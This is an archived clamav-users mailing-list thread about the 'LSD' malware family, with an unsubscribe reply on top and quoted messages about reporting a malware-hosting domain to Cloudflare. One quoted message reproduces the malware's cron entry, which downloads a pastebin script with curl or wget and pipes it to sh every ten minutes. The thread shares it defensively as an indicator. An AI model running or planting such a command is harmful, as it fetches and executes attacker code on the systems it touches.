[prev in list] [next in list] [prev in thread] [next in thread] 

List:       clamav-users
Subject:    Re: [clamav-users] LSD Malwares
From:       "Joel Esler \(jesler\) via clamav-users" <clamav-users () lists ! clamav ! net>
Date:       2019-04-29 13:33:13
Message-ID: 56AC678E-7A12-44D3-A057-019B9E246B27 () cisco ! com
[Download RAW message or body]

[Attachment #2 (text/plain)]

Thank you for writing in.

Go to this URL to change user options or unsubscribe:
https://lists.Clamav.net/mailman/listinfo/Clamav-users

or by sending an email to \
Clamav-users-leave@lists.Clamav.net<mailto:Clamav-users-leave@lists.Clamav.net>

Thanks!

-- Joel Esler Manager, Communities Division Cisco Talos Intelligence Group \
http://www.talosintelligence.com

On Apr 26, 2019, at 1:35 PM, Vicstardust via clamav-users \
<clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>> wrote:

Pls check my Previous EMAIL "UNSUBSCRIBE ME...ETC", just sent.
TXS

Have a nice Weekend!


Obter o BlueMail para Android<http://www.bluemail.me/r?b=14726>
Em 26/04/2019, em 04:26, Xavier Maysonnave via clamav-users \
<clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>> escreveu: Hi \
All,

Thanks for your feedback.
I'm going to report to Cloudflare this URL.

However keep in mind that there are other URLs who are involved in this family.
*/10 * * * * (curl -fsSL \
https://pastebin.com/raw/wR3ETdbi||wget<https://pastebin.com/raw/wR3ETdbi%7C%7Cwget> \
-q -O- https://pastebin.com/raw/wR3ETdbi)|sh<https://pastebin.com/raw/wR3ETdbi)%7Csh> \
This one targets Jenkins, another popular OpenSource tool, not used on our \
infrastructure though.

I'm still very interested with the consequences of this malwares. Any hints will be \
greatly appreciated.

Thanks.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC \
6CC9<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>


Le ven. 26 avr. 2019 Ã  08:03, Dave Warren via clamav-users \
<clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>> a écrit : The \
same applies: Report it. Cloudflare will either forward the complaint for you, or \
block the offending URL (or both).

On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a cloudflare IP block. They're become part of
> the problem.
> 
> dp
> 
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
> > Perhaps it would also be worthwhile to report dd.heheda.tk<http://dd.heheda.tk/> \
> > to their hosting provider & domain registrar that they are hosting malware and
> > get that site shut down...
> > 

_______________________________________________

clamav-users mailing list
clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml

________________________________


clamav-users mailing list
clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml

_______________________________________________

clamav-users mailing list
clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml


[Attachment #3 (text/html)]

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body style="word-wrap: break-word; -webkit-nbsp-mode: space; line-break: \
after-white-space;" class=""> <span style="white-space:pre-wrap;" class="">Thank you \
for writing in.<br class=""> <br class="">
Go to this URL to change user options or unsubscribe:<br class="">
<a href="https://lists.Clamav.net/mailman/listinfo/Clamav-users" \
class="">https://lists.Clamav.net/mailman/listinfo/Clamav-users</a><br class=""> <br \
class=""> or by sending an email to <a \
href="mailto:Clamav-users-leave@lists.Clamav.net" class=""> \
Clamav-users-leave@lists.Clamav.net</a><br class=""> <br class="">
Thanks!</span>
<div class=""><span style="white-space: pre-wrap;" class=""><br class="">
</span></div>
<div class=""><span style="white-space: pre-wrap;" class="">-- Joel Esler Manager, \
Communities Division Cisco Talos Intelligence Group <a \
href="http://www.talosintelligence.com" \
class="">http://www.talosintelligence.com</a></span><br class=""> <div><br class="">
<blockquote type="cite" class="">
<div class="">On Apr 26, 2019, at 1:35 PM, Vicstardust via clamav-users &lt;<a \
href="mailto:clamav-users@lists.clamav.net" \
class="">clamav-users@lists.clamav.net</a>&gt; wrote:</div> <br \
class="Apple-interchange-newline"> <div class="">
<div class="">
<div dir="auto" class="">Pls check my Previous EMAIL &quot;UNSUBSCRIBE \
ME...ETC&quot;, just sent.<br class=""> </div>
<div dir="auto" class="">TXS<br class="">
<br class="">
</div>
<div dir="auto" class="">Have a nice Weekend!<br class="">
<br class="">
<br class="">
</div>
<div dir="auto" class=""><!-- tmjah_g_1299s -->Obter o<!-- tmjah_g_1299e --> <a \
href="http://www.bluemail.me/r?b=14726" class=""> <!-- tmjah_g_1299s -->BlueMail para \
Android<!-- tmjah_g_1299e --></a><!-- tmjah_g_1299s --><!-- tmjah_g_1299e --> </div>
<div class="gmail_quote">Em 26/04/2019, em 04:26, Xavier Maysonnave via clamav-users \
&lt;<a href="mailto:clamav-users@lists.clamav.net" target="_blank" \
class="">clamav-users@lists.clamav.net</a>&gt; escreveu: <blockquote \
class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, \
204, 204); padding-left: 1ex;"> <div dir="ltr" class="">
<div class="gmail_default" style="font-family:verdana,sans-serif">Hi All,</div>
<div class="gmail_default" style="font-family:verdana,sans-serif"><br class="">
</div>
<div class="gmail_default" style="font-family:verdana,sans-serif">Thanks for your \
feedback.</div> <div class="gmail_default" style="font-family:verdana,sans-serif">I'm \
going to report to Cloudflare this URL.</div> <div class="gmail_default" \
style="font-family:verdana,sans-serif"><br class=""> </div>
<div class="gmail_default" style="font-family:verdana,sans-serif">However keep in \
mind that there are other URLs who are involved in this family.</div> <div \
class="gmail_default" style="font-family:verdana,sans-serif"><span \
style="color:rgb(23,43,77);font-family:-apple-system,BlinkMacSystemFont,&quot;Segoe \
UI&quot;,Roboto,&quot;Noto Sans&quot;,Oxygen,Ubuntu,&quot;Droid \
Sans&quot;,&quot;Helvetica \
                Neue&quot;,sans-serif;font-size:14px;letter-spacing:-0.084px" \
                class="">*/10
 * * * * (curl -fsSL&nbsp;</span><a \
href="https://pastebin.com/raw/wR3ETdbi%7C%7Cwget" target="_blank" rel="nofollow \
noopener noreferrer" \
style="box-sizing:inherit;color:rgb(0,82,204);text-decoration-line:none;font-family:-apple-system,BlinkMacSystemFont,&quot;Segoe \
UI&quot;,Roboto,&quot;Noto Sans&quot;,Oxygen,Ubuntu,&quot;Droid \
Sans&quot;,&quot;Helvetica \
Neue&quot;,sans-serif;font-size:14px;letter-spacing:-0.084px" \
class="">https://pastebin.com/raw/wR3ETdbi||wget</a><span \
style="color:rgb(23,43,77);font-family:-apple-system,BlinkMacSystemFont,&quot;Segoe \
UI&quot;,Roboto,&quot;Noto Sans&quot;,Oxygen,Ubuntu,&quot;Droid \
Sans&quot;,&quot;Helvetica \
                Neue&quot;,sans-serif;font-size:14px;letter-spacing:-0.084px" \
                class="">&nbsp;-q
 -O-&nbsp;</span><a href="https://pastebin.com/raw/wR3ETdbi)%7Csh" target="_blank" \
rel="nofollow noopener noreferrer" \
style="box-sizing:inherit;color:rgb(7,71,166);outline:0px;font-family:-apple-system,BlinkMacSystemFont,&quot;Segoe \
UI&quot;,Roboto,&quot;Noto Sans&quot;,Oxygen,Ubuntu,&quot;Droid \
Sans&quot;,&quot;Helvetica \
Neue&quot;,sans-serif;font-size:14px;letter-spacing:-0.084px" \
class="">https://pastebin.com/raw/wR3ETdbi)|sh</a><br class=""> </div>
<div class="gmail_default" style="font-family:verdana,sans-serif">This one targets \
Jenkins, another popular OpenSource tool, not used on our infrastructure \
though.</div> <div class="">
<div dir="ltr" class="gmail_signature" data-smartmail="gmail_signature">
<div dir="ltr" class="">
<div class="">
<div dir="ltr" class="">
<div class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div dir="ltr" class="">
<div style="font-size:small;font-family:arial,sans-serif" class=""><span \
style="font-family:arial,helvetica,sans-serif" class=""><br class=""> </span></div>
<div style="" class=""><font face="arial, helvetica, sans-serif" \
class="">I</font><span class="gmail_default" style=""><font face="verdana, \
sans-serif" class="">'m still very interested&nbsp;with the consequences of this \
malwares. Any hints will be greatly appreciated.</font></span></div> <div \
style="font-size:small;font-family:arial,sans-serif" class=""><span \
style="font-family:arial,helvetica,sans-serif" class=""><span class="gmail_default" \
style="font-family:verdana,sans-serif"><br class=""> </span></span></div>
<div style="font-size:small;font-family:arial,sans-serif" class=""><span \
style="font-family:arial,helvetica,sans-serif" class=""><span class="gmail_default" \
style="font-family:verdana,sans-serif">Thanks.</span></span></div> <div \
style="font-size:small;font-family:arial,sans-serif" class=""><span \
style="font-family:arial,helvetica,sans-serif" class=""><span class="gmail_default" \
style="font-family:verdana,sans-serif"><br class=""> </span></span></div>
<div style="font-size:small;font-family:arial,sans-serif" class=""><span \
style="font-family:arial,helvetica,sans-serif" class=""><span class="gmail_default" \
style="font-family:verdana,sans-serif"></span>Light</span><br class=""> </div>
<div class="">
<div dir="ltr" class="">
<div class=""><font face="arial, helvetica, sans-serif" size="2" class=""><br \
class=""> </font></div>
<div class=""><font face="arial, helvetica, sans-serif" size="2" class=""></font>
<div style="display:inline" class=""><font face="arial, helvetica, sans-serif" \
size="2" class="">Pudhuveedu / Xavier<br class=""> </font></div>
</div>
<div class=""><font face="arial, helvetica, sans-serif" size="2" class=""></font>
<div style="display:inline" class=""><font face="arial, helvetica, sans-serif" \
size="2" class=""><br class=""> </font></div>
</div>
<div class=""><span style="font-family: monospace, courier; font-size: 13px;" \
class="">PGP Fingerprint:&nbsp;</span><a \
href="http://keyserver.ubuntu.com/pks/lookup?op=get&amp;search=0x081CB6FB2EAC6CC9" \
style="font-family:monospace,courier;font-size:13px" target="_blank" class="">CAE5  \
CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9</a></div> </div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<br class="">
</div>
<br class="">
<div class="gmail_quote">
<div dir="ltr" class="gmail_attr">Le&nbsp;ven. 26 avr. 2019 Ã &nbsp;08:03, Dave \
Warren via clamav-users &lt;<a href="mailto:clamav-users@lists.clamav.net" \
class="">clamav-users@lists.clamav.net</a>&gt; a écrit&nbsp;:<br class=""> </div>
<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid \
rgb(204,204,204);padding-left:1ex"> The same applies: Report it. Cloudflare will \
either forward the <br class=""> complaint for you, or block the offending URL (or \
both).<br class=""> <br class="">
On 2019-04-25 19:16, Dennis Peterson wrote:<br class="">
&gt; That domain is hosted on a cloudflare IP block. They're become part of <br \
class=""> &gt; the problem.<br class="">
&gt; <br class="">
&gt; dp<br class="">
&gt; <br class="">
&gt; On 4/25/19 7:52 AM, J.R. via clamav-users wrote:<br class="">
&gt;&gt; Perhaps it would also be worthwhile to report <a href="http://dd.heheda.tk/" \
rel="noreferrer" target="_blank" class=""> dd.heheda.tk</a> to their<br class="">
&gt;&gt; hosting provider &amp; domain registrar that they are hosting malware and<br \
class=""> &gt;&gt; get that site shut down...<br class="">
&gt;&gt;<br class="">
<br class="">
_______________________________________________<br class="">
<br class="">
clamav-users mailing list<br class="">
<a href="mailto:clamav-users@lists.clamav.net" target="_blank" \
class="">clamav-users@lists.clamav.net</a><br class=""> <a \
href="https://lists.clamav.net/mailman/listinfo/clamav-users" rel="noreferrer" \
target="_blank" class="">https://lists.clamav.net/mailman/listinfo/clamav-users</a><br \
class=""> <br class="">
<br class="">
Help us build a comprehensive ClamAV guide:<br class="">
<a href="https://github.com/vrtadmin/clamav-faq" rel="noreferrer" target="_blank" \
class="">https://github.com/vrtadmin/clamav-faq</a><br class=""> <br class="">
<a href="http://www.clamav.net/contact.html#ml" rel="noreferrer" target="_blank" \
class="">http://www.clamav.net/contact.html#ml</a><br class=""> </blockquote>
</div>
<pre class="blue"><br class=""><hr class=""><br class=""><br class="">clamav-users \
mailing list<br class=""><a href="mailto:clamav-users@lists.clamav.net" \
class="">clamav-users@lists.clamav.net</a><br class=""><a \
href="https://lists.clamav.net/mailman/listinfo/clamav-users" \
class="">https://lists.clamav.net/mailman/listinfo/clamav-users</a><br class=""><br \
class=""><br class="">Help us build a comprehensive ClamAV guide:<br class=""><a \
href="https://github.com/vrtadmin/clamav-faq" \
class="">https://github.com/vrtadmin/clamav-faq</a><br class=""><br class=""><a \
href="http://www.clamav.net/contact.html#ml" \
class="">http://www.clamav.net/contact.html#ml</a><br class=""></pre> </blockquote>
</div>
</div>
<br class="">
_______________________________________________<br class="">
<br class="">
clamav-users mailing list<br class="">
<a href="mailto:clamav-users@lists.clamav.net" \
class="">clamav-users@lists.clamav.net</a><br class=""> <a \
href="https://lists.clamav.net/mailman/listinfo/clamav-users" \
class="">https://lists.clamav.net/mailman/listinfo/clamav-users</a><br class=""> <br \
class=""> <br class="">
Help us build a comprehensive ClamAV guide:<br class="">
https://github.com/vrtadmin/clamav-faq<br class="">
<br class="">
http://www.clamav.net/contact.html#ml<br class="">
</div>
</blockquote>
</div>
<br class="">
</div>
</body>
</html>



_______________________________________________

clamav-users mailing list
clamav-users@lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users


Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml

--===============8115574834415031778==--

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic